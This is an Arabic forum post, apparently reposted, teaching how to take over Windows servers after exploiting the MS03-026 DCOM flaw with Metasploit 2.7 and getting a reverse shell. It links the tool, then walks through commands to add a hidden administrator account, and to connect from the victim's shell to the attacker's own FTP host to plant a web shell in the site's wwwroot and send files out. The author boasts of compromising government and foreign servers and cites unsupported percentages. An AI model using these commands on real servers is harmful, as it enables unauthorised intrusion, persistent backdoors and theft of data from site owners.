عماد الدين السقا

32

2,550

شرح التحكم الكامل في سرفرات الويندوز من الميتا سبلويت بعد الاتصال العكسي بالسرفر .



ابدا موضوعي باسم الله الرحمن الرحيم واصلي واسلم علي اشرف الخلق اجمعين سيدنا محمد النبي الامي ومن اتبعه باخلاص الي يوم الدين . أما بعد .


===================================

M e t a Sploit Project
هذا الاسم الذي لطالما مر علي الكثيرين ممن يتصفحون الانترنت سواء في مجال القرصنه او غيره
ما هو مشروع الميتا سبلويت وفيما يستخدم ؟؟

بدأ مشروع ثغرات M e t a sploit في عام 2003 تقريبا
بالطبع وكما هو معروف ان اي مشروع او اداه يتم طرحها علي الشبكه العنكبوتيه
تكون سلاح ذو حدين وكل شخص يستخدمها علي حسب رؤيته وعقليته

فاداة الميتا سبلويت يمكن استخدامها في مجال الحمايه وكذا في مجال الاختراق
اما في مجال الاختراق فان الثغرات المطروحه في مشروع الميتا سبلويت يتم بها اختراق السرفرات

او اجهزة الحواسيب الالكترونيه او يتم بها مهاجمة انظمة التشغيل ومتصفحات الانترنت
واما الحمايه فمن الماكد ان ارباب البرامج التي تم طرح ثغراتها في البرنامج لن يقفو مكتوفي الايدي

فطالما عرفت الثغره فبالاكيد عرف الترقيع وهذا يضمن لهم امان اكثر لمشاريعهم الي ان يتم اكتشاف ثغره اخري ربما تهدد نظامهم الأمني
حسنا ما هي أخطر ثغرات هذا المشروع ؟

لا شك في ان اي ثغره تم طرحها في مشروع الميتا سبلويت هي ثغرة بمثابة 0-day يعني ثغره قاتله

ولاكن اخطر الثغرات التي مرت بمشروع الميتا سبلويت كانت ثغرة msrpc_dcom_ms03_026
وكان أحد أخطر استخداماتها هو في انشاء مستخدم جديد علي السرفر يملك نفس صلاحية مدير النظام

والتي راح ضحيتها عشرات وربما مئات السرفرات الحكوميه في انحاء العالم وكان لجمهورية الصين نصيب الاسد في المواقع الحكوميه التي تم الاطاحه بها

فاذكر انا ما يقرب من 91% من المواقع الحكوميه الصينيه تعمل علي سرفرات ويندوز
وما يقرب من نسبة 78% من المواقع الحكوميه في العالم يعمل علي سرفرات ويندوز وهذا الكلام عن تجربه شخصيه واحصائيه ليست بالتخمينيه ,

ولاكن الاصدارات المصابه بهذه الثغره كانت IIS4 , IIS5
اما الاصدار السادس وما بعده فلا تعمل عليهم الثغره علي حسب ذكر المصدر من شركة ميكروفت
وعلي حسب اعتقادي فان اول من كان يستخدم تلك الثغره هم الفريق الامريكي PoisonBox

وهذا الكلام علي حسب ذكر الهكرز الصينين في الحرب الالكترونيه التي تمت بين الدولتين في عام 2001
اوووف اعذروني فلدي الكثير لاقوله في هذا المجال ولاكني لا احب ان اطيل اكثر من ذلك وسابدا بالسرد باذن الله

بالنسبه لثغرة msrpc_dcom_ms03_026 فمنذ ان تم طرحها فما من شخص قام بشرحها الا قام بشرح كيفية استخدامها في انشاء حساب جديد علي السرفر بصلاحيات المدير

ومن شرح استخدامها في الاتصال العكسي لم يقم سوي بالتصال بالدوس ويقول اكملو انتم ؟؟
ولاكن ماذا بعد الاتصال بموجه الاوامر الخاص بالسرفر ؟؟

هذا هو موضوع اليوم باذن الله لكي يكون هذا الموضوع مختصر عن الميتا سبلويت الاصدار الثاني
والموضوع القادم سيكون عن الاصدار الثالث وساطرح ثغرات خاصه باذن الله
حسنا رابط تحميل الاداه الاصدار 2.7 :

كود PHP:

http://file12.9q9q.net/Download/15152612/framework-2.7.rar.html

طبعا حتي لا يطول الموضوع فقد تم شرح الاداه اكثر من مره وتم شرح استخدامها


حسنا بعد تثبيت الاداه وفتح الـ MsConsol تفعل الآتي :



طبعا الأمر واضح فهو لاستخدام ثغرة msrpc_dcom :
كود PHP:
use msrpc_dcom_ms03_026  

طبعا الثغره تم شرحها من قبل كثيرا جدا جداوانا مش بحب احكي في المحكي وحفاظا علي قوانين المنتدي مش هكتب روابط للموضوع بس تقدرو تبحثو عنو في جوجل ,


المهم ندخل في الاساس بعد ما طبقت الثغره واتصلت عكسي بالسرفر واصبح موجه الأوامر الخاص بالجهاز مفتوح امامك فماذا تفعل ؟

(( ملحوظه موجه الاوامر هو الدوس (doc) وهي اختصار (disk operating system) وطبعا نفس الاسم معروفه به ثغرات الدوس doc ولاكن هذه الثانيه تعني
(denial of service) والتي تعني حجب الخدمه )

حسنا نعود الي الموضوع الرئيسي وهذه صورة من الدوس الخاص بالجهاز الذي قمت بالاتصال العكسي به وهو سرفر هولندي علي كل حال :

بالفعل كما تلمحون في الصورة بالاعلي فان الذي طبقت منه الاوامر هو :

كود PHP:
                       C :  D o c u m e n t s and Settings  hima  

ولاكن هذا طبعا لا يعني انني اطبق علي جهازي الشخصي وهذا واضح من نفس الصورة فقط كل ما في الامر انني قمت بعمل اشرح بعدما قمت بترويت السرفر واليوزر هو اسمي وليس هناك غرابه في ذلك ... ,


الآن ماذا تفعل بعدما قمت بالاتصال العكسي بالسرفر ؟؟

فلنفرض انك تريد ترويت السرفر ؟؟ بسيطه تقوم بتطبيق الأمر :

كود PHP:
                       net user virus_hima paswd /add  



طبعا تستبدل virus_hima باليوزر الذي تختاره و paswd بالباسورد الذي تريده


ثم :
كود PHP:
                       net localgroup administrators virus_hima /add  

الآن قمت بأضافة اليوزر الي قآئمة المديرين للنظام وأصبحت تملك الصلاحيه للتحكم الكامل بالسرفر




والآن تستطيع الإتصال بالسرفر عن طريق الريموت ديسك توب ويصبح الجهاز تحت تحكمك

ولاكن لنكن واقعيين أكثر فمعظم السرفرات يحجب تنفيذ الأمر net user وأتباعه من
كود PHP:
                       net user usr pwd /add   >>  etc  

فهل نترك السرفر ونخرج ؟ بالطبع لا ,

فلنفرض انك تريد رفع شل علي جهاز السرفر لتتحكم في مواقعه مثلا طالما طاحت مننا حيلتنا الاولي
فالأمر بسيط بإذن الله . .

في البدايه لابد يكون معاك سي بنل بتاع اي موقع حتي اذا مساحه مجانيه مش مشكله المهم يكون معاك بيانات الاف تي بي لماذا ؟

لاننا سنقوم بالاتصال بالـ ftp الخاص بمساحتنا عن طريق الدوس وسحب ملف الشل الي مسار الموقع علي السرفر ومن ثم استعراضه من المتصفح والتمتع بالإختراق .

في البدآيه نقوم بالتنقل الي المسار الموجود به المواقع علي السرفر طبعا التنقل يكون عن طريق الأمر
كود PHP:
                       cd  

واستعراض الملفات يكون عن طريق الأمر :

كود PHP:
                       dir  

ولا تنسي انك تستخدم الدوس يعني في الويندوز مش لينوكس بيكون :


كود PHP:
                       cd  & ls -la  

حسنا بالنسبه لي فالمسار هاهنا :

كود PHP:
                       C: Inetpub  wwwroot  


حسنا الآن نكتب الأمر :
كود PHP:
                       ftp open  

وستون النتيجه :

كود PHP:
                       C o c u m e n t s and Settings  hima>ftp open 

Unknown host open.

ftp>


ثــــــــــــــــــــم :


كما تشاهدون في الصوة بالاعلي نكتب الأمر :
كود PHP:



                       open vhima.110mb.com  



ثم سيطلب منك اليوزر وبعدها الباسورد والان انت متصل بالسي بنل الخاص بك من الدوس


والان من الاف تي بي ترفع شل علي مساحتك الخاصه ثم تقوم بسحبه علي السرفر في المسار

الذي حددته في البدايه والذي يحوي موقع السرفر ثم تشغله من المتصفح ,, تآبع :


الآن تم والحمد لله سحب الشل علي السرفر وتسطيع استدعائه من المتصفح وتفعل بالسرفر ما تشاء باذن الله

طبعا لا احد يقولي ممكن نخترق الاجهزه اللي تحت الشبكه والكلام ده لانه معروف في اجهزه السرفر بيكون الايبي الخاص بها اي بي ستاتيك يعني ثابت

مش معقول بيكون جهاز سرفر بيشيل مواقع وهيروح ياجر وصلة نت من واحد جنبهم

طبعا بالنسبه للسحب والارسال فاذا اردت سحب ملف من موقعك الي جهاز السرفر تستخدم الأمر :
كود PHP:
                       get file.whatever  

كما هو واضح في الصورة بالاعلي , اما اذا اردت ارسال ملف من جهاز السرفر الي الافتبي الخاص بك

لسحبه علي جهازك مثلا فتستخدم الأمر :

كود PHP:
                       send file.whatever  

طبعا whatever هي الإمتداد >> e.g >> txt,exe,gif

وطبعا نفس الطريقه لها استخدامات اخري ولاكن اترككم تتعاملون معها كل علي هواه
والآن تم الشرح بحمد الله وأتمني ان يكون شرحا كافيا وافيا من الاخطاء خاليا . . .

منقول للفائدة

التعليقات (2)

أبـو الليث     

شكراااا عمي عماد من يومين كنت بسيرته للميتا سبلويت
نسسسسسخة لفواز باراوي

الزعيم بدر